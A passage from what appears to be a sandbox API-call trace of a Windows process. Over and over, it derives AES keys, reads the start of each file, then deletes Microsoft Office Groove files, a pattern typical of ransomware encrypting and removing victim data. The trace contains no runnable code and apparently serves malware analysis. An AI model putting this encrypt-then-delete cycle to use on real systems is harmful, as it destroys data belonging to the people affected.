office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_mid_over.gif")) returned 1 [0165.253] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.253] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.253] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.253] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.254] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x26e [0165.254] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.256] CryptDestroyHash (hHash=0x284d628) returned 1 [0165.256] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.256] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.257] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_right.gif")) returned 1 [0165.258] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.259] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.259] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.259] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.259] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe1 [0165.259] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.260] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0165.260] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.260] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.262] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right_disable.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_right_disable.gif")) returned 1 [0165.263] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.263] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.263] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.263] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.263] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x41b [0165.263] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.279] CryptDestroyHash (hHash=0x284d628) returned 1 [0165.279] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.279] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.280] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right_over.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_right_over.gif")) returned 1 [0165.303] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0165.303] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0165.304] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0165.304] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.304] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d628) returned 1 [0165.304] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x368c [0165.304] ReadFile (in: hFile=0x4e8, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0165.321] CryptDestroyHash (hHash=0x284d668) returned 1 [0165.321] CryptDestroyKey (hKey=0x284d628) returned 1 [0165.321] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.322] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\Attachments.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\attachments.jpg")) returned 1 [0165.324] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0165.324] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0165.324] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.324] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d628) returned 1 [0165.324] GetFileSize (in: hFile=0x4fc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3e01 [0165.324] ReadFile (in: hFile=0x4fc, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0165.343] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0165.343] CryptDestroyKey (hKey=0x284d628) returned 1 [0165.343] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.344] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\DigitalInk.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\digitalink.jpg")) returned 1 [0165.346] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0165.346] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0165.346] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.346] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d628) returned 1 [0165.346] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x20e8 [0165.347] ReadFile (in: hFile=0x4e8, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0165.356] CryptDestroyHash (hHash=0x284d668) returned 1 [0165.356] CryptDestroyKey (hKey=0x284d628) returned 1 [0165.356] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.357] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\EmbeddedView.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\embeddedview.jpg")) returned 1 [0165.369] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0165.370] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0165.370] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.370] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d628) returned 1 [0165.370] GetFileSize (in: hFile=0x4fc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3ad9 [0165.370] ReadFile (in: hFile=0x4fc, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0165.396] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0165.396] CryptDestroyKey (hKey=0x284d628) returned 1 [0165.396] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.398] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\SectionHeading.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\sectionheading.jpg")) returned 1 [0165.400] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0165.400] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0165.400] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.400] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d628) returned 1 [0165.400] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x37a7 [0165.400] ReadFile (in: hFile=0x4e8, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0165.414] CryptDestroyHash (hHash=0x284d668) returned 1 [0165.414] CryptDestroyKey (hKey=0x284d628) returned 1 [0165.414] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.416] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\StaticText.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\statictext.jpg")) returned 1 [0165.417] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0165.418] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0165.418] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.418] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d628) returned 1 [0165.418] GetFileSize (in: hFile=0x4fc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4127 [0165.418] ReadFile (in: hFile=0x4fc, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0165.428] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0165.428] CryptDestroyKey (hKey=0x284d628) returned 1 [0165.428] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.429] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\UnformattedNumeric.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\unformattednumeric.jpg")) returned 1 [0165.431] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.431] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.431] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.431] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.431] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b2 [0165.431] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.451] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0165.451] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.451] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.452] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsBlankPage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsblankpage.html")) returned 1 [0165.454] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.455] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.455] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.455] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.455] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7a7 [0165.455] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.474] CryptDestroyHash (hHash=0x284d628) returned 1 [0165.474] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.474] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.475] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsBrowserUpgrade.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsbrowserupgrade.html")) returned 1 [0165.477] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.477] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.477] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.477] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.477] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x805 [0165.477] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.496] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0165.496] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.496] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.497] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsDoNotTrust.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsdonottrust.html")) returned 1 [0165.499] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.499] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.499] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.499] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.500] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc96 [0165.500] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.515] CryptDestroyHash (hHash=0x284d628) returned 1 [0165.515] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.515] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.516] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formshomepage.html")) returned 1 [0165.518] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.518] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.518] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.518] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.519] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x15fc [0165.519] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.523] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0165.523] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.523] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.525] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePageScript.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formshomepagescript.js")) returned 1 [0165.526] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.527] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.527] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.527] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.527] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x40c [0165.527] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.548] CryptDestroyHash (hHash=0x284d628) returned 1 [0165.549] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.549] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.550] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePageStyle.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formshomepagestyle.css")) returned 1 [0165.552] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.552] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.552] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.552] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.552] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3a2 [0165.552] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.581] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0165.581] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.581] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.583] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsPreviewTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formspreviewtemplate.html")) returned 1 [0165.584] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.585] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.585] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.585] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.585] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x262 [0165.585] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.620] CryptDestroyHash (hHash=0x284d628) returned 1 [0165.620] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.620] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.622] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsPrintTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsprinttemplate.html")) returned 1 [0165.645] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0165.659] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.659] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.659] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.659] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.659] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6fc [0165.660] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.662] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0165.662] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.662] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.663] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsVersion1Warning.htm" 